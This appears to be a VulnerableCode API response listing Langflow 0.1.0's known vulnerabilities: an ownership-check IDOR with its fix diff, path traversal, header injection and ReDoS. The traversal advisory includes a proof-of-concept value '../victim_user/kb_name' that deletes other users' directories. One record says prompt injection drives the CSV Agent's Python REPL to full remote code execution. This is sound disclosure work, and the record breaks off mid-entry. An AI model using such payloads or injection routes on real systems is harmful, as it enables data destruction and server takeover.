Lookup for vulnerable packages by Package URL.

GET /api/packages/41605?format=api
HTTP 200 OK
Allow: GET, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "url": "http://public2.vulnerablecode.io/api/packages/41605?format=api",
    "purl": "pkg:pypi/langflow@0.1.0",
    "type": "pypi",
    "namespace": "",
    "name": "langflow",
    "version": "0.1.0",
    "qualifiers": {},
    "subpath": "",
    "is_vulnerable": true,
    "next_non_vulnerable_version": "1.9.1",
    "latest_non_vulnerable_version": "1.9.1",
    "affected_by_vulnerabilities": [
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91746?format=api",
            "vulnerability_id": "VCID-1dek-kvzf-27d1",
            "summary": "Langflow: Authenticated Users Can Read, Modify, and Delete Any Flow via Missing Ownership Check\n## Vulnerability\n\n### IDOR in `GET/PATCH/DELETE /api/v1/flow/{flow_id}`\n\nThe `_read_flow` helper in `src/backend/base/langflow/api/v1/flows.py` branched on the `AUTO_LOGIN` setting to decide whether to filter by `user_id`. When `AUTO_LOGIN` was `False` (i.e., authentication was enabled), neither branch enforced an ownership check — the query returned any flow matching the given UUID regardless of who owned it.\n\nThis exposed any authenticated user to:\n\n- **Read** any other user's flow, including embedded plaintext API keys\n- **Modify** the logic of another user's AI agents\n- **Delete** flows belonging to other users\n\nThe vulnerability was introduced by the conditional logic that was meant to accommodate public/example flows (those with `user_id = NULL`) under auto-login mode, but inadvertently left the authenticated path without an ownership filter.\n\n---\n\n## Fix (PR #8956)\n\nThe fix removes the `AUTO_LOGIN` conditional entirely and unconditionally scopes the query to the requesting user:\n\n```diff\n-    auth_settings = settings_service.auth_settings\n-    stmt = select(Flow).where(Flow.id == flow_id)\n-    if auth_settings.AUTO_LOGIN:\n-        stmt = stmt.where(\n-            (Flow.user_id == user_id) | (Flow.user_id == None)  # noqa: E711\n-        )\n+    stmt = select(Flow).where(Flow.id == flow_id).where(Flow.user_id == user_id)\n```\n\nAll three operations — read, update, and delete — route through `_read_flow`, so the single change covers the full attack surface. A cross-user isolation test (`test_read_flows_user_isolation`) was added to prevent regression.\n\n---\n\n## Acknowledgements\n\nLangflow thanks the security researcher who responsibly disclosed this vulnerability:\n\n- **[@chximn-dt](https://github.com/chximn-dt)**",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34046",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00052",
                            "scoring_system": "epss",
                            "scoring_elements": "0.16672",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34046"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/pull/8956",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T13:57:05Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/pull/8956"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-8c4j-f57c-35cf",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T13:57:05Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-8c4j-f57c-35cf"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34046",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34046"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-8c4j-f57c-35cf",
                    "reference_id": "GHSA-8c4j-f57c-35cf",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-8c4j-f57c-35cf"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/46615?format=api",
                    "purl": "pkg:pypi/langflow@1.5.1",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1ynd-c2hz-53hx"
                        },
                        {
                            "vulnerability": "VCID-2195-gd33-xbdp"
                        },
                        {
                            "vulnerability": "VCID-2649-thqq-r3d2"
                        },
                        {
                            "vulnerability": "VCID-4swq-hbjm-3ucd"
                        },
                        {
                            "vulnerability": "VCID-bb6r-1f6u-t7ed"
                        },
                        {
                            "vulnerability": "VCID-ncvf-vzqr-uydz"
                        },
                        {
                            "vulnerability": "VCID-q4r1-xjfk-7bg9"
                        },
                        {
                            "vulnerability": "VCID-qwtw-q92t-quhz"
                        },
                        {
                            "vulnerability": "VCID-rc54-gw71-gyau"
                        },
                        {
                            "vulnerability": "VCID-rrva-95s5-kbcf"
                        },
                        {
                            "vulnerability": "VCID-sbea-kkfu-akgb"
                        },
                        {
                            "vulnerability": "VCID-u8mw-7znw-rfab"
                        },
                        {
                            "vulnerability": "VCID-v5pc-pdm9-97g8"
                        },
                        {
                            "vulnerability": "VCID-ypxh-x2hy-3uhb"
                        },
                        {
                            "vulnerability": "VCID-ysnc-jyxb-6qcy"
                        },
                        {
                            "vulnerability": "VCID-zqwj-45w7-7kft"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.5.1"
                }
            ],
            "aliases": [
                "CVE-2026-34046",
                "GHSA-8c4j-f57c-35cf"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1dek-kvzf-27d1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50432?format=api",
            "vulnerability_id": "VCID-1ynd-c2hz-53hx",
            "summary": "Langflow has Remote Code Execution in CSV Agent\nThe CSV Agent node in Langflow hardcodes `allow_dangerous_code=True`, which automatically exposes LangChain’s Python REPL tool (`python_repl_ast`). As a result, an attacker can execute arbitrary Python and OS commands on the server via prompt injection, leading to full Remote Code Execution (RCE).",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27966",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.41016",
                            "scoring_system": "epss",
                            "scoring_elements": "0.97466",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27966"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/commit/d8c6480daa17b2f2af0b5470cdf5c3d28dc9e508",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-02-27T14:15:24Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/commit/d8c6480daa17b2f2af0b5470cdf5c3d28dc9e508"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27966",
                    "reference_id": "CVE-2026-27966",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27966"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-3645-fxcv-hqr4",
                    "reference_id": "GHSA-3645-fxcv-hqr4",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-3645-fxcv-hqr4"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-3645-fxcv-hqr4",
                    "reference_id": "GHSA-3645-fxcv-hqr4",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-02-27T14:15:24Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-3645-fxcv-hqr4"
                }
            ],
            "fixed_packages": [],
            "aliases": [
                "CVE-2026-27966",
                "GHSA-3645-fxcv-hqr4"
            ],
            "risk_score": 10.0,
            "exploitability": "2.0",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1ynd-c2hz-53hx"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/93673?format=api",
            "vulnerability_id": "VCID-2195-gd33-xbdp",
            "summary": "Langflow Knowledge Bases API is Vulnerable to Path Traversal\n## Summary\nLangflow is vulnerable to Path Traversal in the Knowledge Bases API (`DELETE /api/v1/knowledge_bases`). This occurs because user-supplied knowledge base names are concatenated directly into file paths without proper sanitization or boundary validation. An authenticated attacker can exploit this flaw to delete arbitrary directories anywhere on the server's filesystem, leading to data loss and potential service disruption.\n\n## Details\nThe vulnerability exists in the `delete_knowledge_bases_bulk` function within `src/backend/base/langflow/api/v1/knowledge_bases.py`. \n\nThis function constructs file paths directly from the user-supplied `kb_names` parameter. While other knowledge base endpoints safely route through standard path resolution (e.g., `_resolve_kb_path()`), the bulk delete handler bypasses this entirely. It builds the path manually and passes it directly to `shutil.rmtree()` without validating if the resulting path resolves outside the intended user directory.\n\n## PoC (Proof of Concept)\nFor the **Bulk Delete** endpoint, an authenticated attacker can supply a traversal sequence in the `kb_names` parameter:\n`../victim_user/kb_name`\n\nBecause the path is passed directly to `shutil.rmtree()` without containment checks, this payload deletes directories outside the intended scope.\n\n## Impact\nAny Langflow instance exposing this endpoint to authenticated users is vulnerable. \nThis exposes the server to:\n* **Cross-user data compromise:** Deletion of directories within another tenant's knowledge base space.\n* **Arbitrary filesystem manipulation:** Directory deletion at any path on the server where the application has write permissions.\n* **Service disruption & Data Loss:** Deletion of critical application files or unrecoverable data loss if backups are co-located on the same filesystem.\n\n## Fixes\nThe issue was addressed in **PR #12243**, which applies `Path.resolve()` to normalize the supplied path and validates that it starts with the authenticated user's directory before deletion. Subsequent updates (backported from PR #12337) introduced robust containment checks using `Path.is_relative_to()` to prevent prefix-ambiguity bugs.\n\n## Acknowledgements\nThanks to the security researchers who responsibly disclosed this vulnerability:\n* @ddlxstudio\n* @nekros1xx",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42048",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00015",
                            "scoring_system": "epss",
                            "scoring_elements": "0.03446",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42048"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-9whx-c884-c68q",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-13T14:13:40Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-9whx-c884-c68q"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42048",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42048"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-9whx-c884-c68q",
                    "reference_id": "GHSA-9whx-c884-c68q",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-9whx-c884-c68q"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/48845?format=api",
                    "purl": "pkg:pypi/langflow@1.9.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-ypxh-x2hy-3uhb"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.9.0"
                }
            ],
            "aliases": [
                "CVE-2026-42048",
                "GHSA-9whx-c884-c68q"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2195-gd33-xbdp"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89031?format=api",
            "vulnerability_id": "VCID-2649-thqq-r3d2",
            "summary": "Langflow vulnerable to injection\nA vulnerability was detected in langflow-ai langflow up to 1.8.3. The impacted element is the function get_client_ip/install_mcp_config of the file src/backend/base/langflow/api/v1/mcp_projects.py of the component Model Context Protocol Configuration API. Performing a manipulation of the argument X-Forwarded-For results in injection. The attack may be initiated remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-6599",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00053",
                            "scoring_system": "epss",
                            "scoring_elements": "0.16853",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-6599"
                },
                {
                    "reference_url": "https://gist.github.com/chenhouser2025/a909c47316b7a0948ee68c109ab747a3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv2",
                            "scoring_elements": "AV:N/AC:L/Au:S/C:P/I:P/A:P/E:POC/RL:W/RC:UR"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T14:24:29Z/"
                        }
                    ],
                    "url": "https://gist.github.com/chenhouser2025/a909c47316b7a0948ee68c109ab747a3"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6599",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6599"
                },
                {
                    "reference_url": "https://vuldb.com/submit/791922",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv2",
                            "scoring_elements": "AV:N/AC:L/Au:S/C:P/I:P/A:P/E:POC/RL:W/RC:UR"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T14:24:29Z/"
                        }
                    ],
                    "url": "https://vuldb.com/submit/791922"
                },
                {
                    "reference_url": "https://vuldb.com/vuln/358234",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv2",
                            "scoring_elements": "AV:N/AC:L/Au:S/C:P/I:P/A:P/E:POC/RL:W/RC:UR"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R"
                        },
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T14:24:29Z/"
                        }
                    ],
                    "url": "https://vuldb.com/vuln/358234"
                },
                {
                    "reference_url": "https://vuldb.com/vuln/358234/cti",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv2",
                            "scoring_elements": "AV:N/AC:L/Au:S/C:P/I:P/A:P/E:POC/RL:W/RC:UR"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R"
                        },
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T14:24:29Z/"
                        }
                    ],
                    "url": "https://vuldb.com/vuln/358234/cti"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*",
                    "reference_id": "cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-v66p-f7x3-4794",
                    "reference_id": "GHSA-v66p-f7x3-4794",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-v66p-f7x3-4794"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/48844?format=api",
                    "purl": "pkg:pypi/langflow@1.8.4",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2195-gd33-xbdp"
                        },
                        {
                            "vulnerability": "VCID-4swq-hbjm-3ucd"
                        },
                        {
                            "vulnerability": "VCID-q4r1-xjfk-7bg9"
                        },
                        {
                            "vulnerability": "VCID-rrva-95s5-kbcf"
                        },
                        {
                            "vulnerability": "VCID-v5pc-pdm9-97g8"
                        },
                        {
                            "vulnerability": "VCID-ypxh-x2hy-3uhb"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.8.4"
                }
            ],
            "aliases": [
                "CVE-2026-6599",
                "GHSA-v66p-f7x3-4794"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2649-thqq-r3d2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/55904?format=api",
            "vulnerability_id": "VCID-9k4q-zwxf-euh1",
            "summary": "Inefficient Regular Expression Complexity in langflow\nA vulnerability classified as problematic was found in Langflow up to 1.0.18. Affected by this vulnerability is an unknown functionality of the file \\src\\backend\\base\\langflow\\interface\\utils.py of the component HTTP POST Request Handler. The manipulation of the argument remaining_text leads to inefficient regular expression complexity. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-9277",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0017",
                            "scoring_system": "epss",
                            "scoring_elements": "0.38017",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-9277"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/blob/main/src/backend/base/langflow/interface/utils.py#L65",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
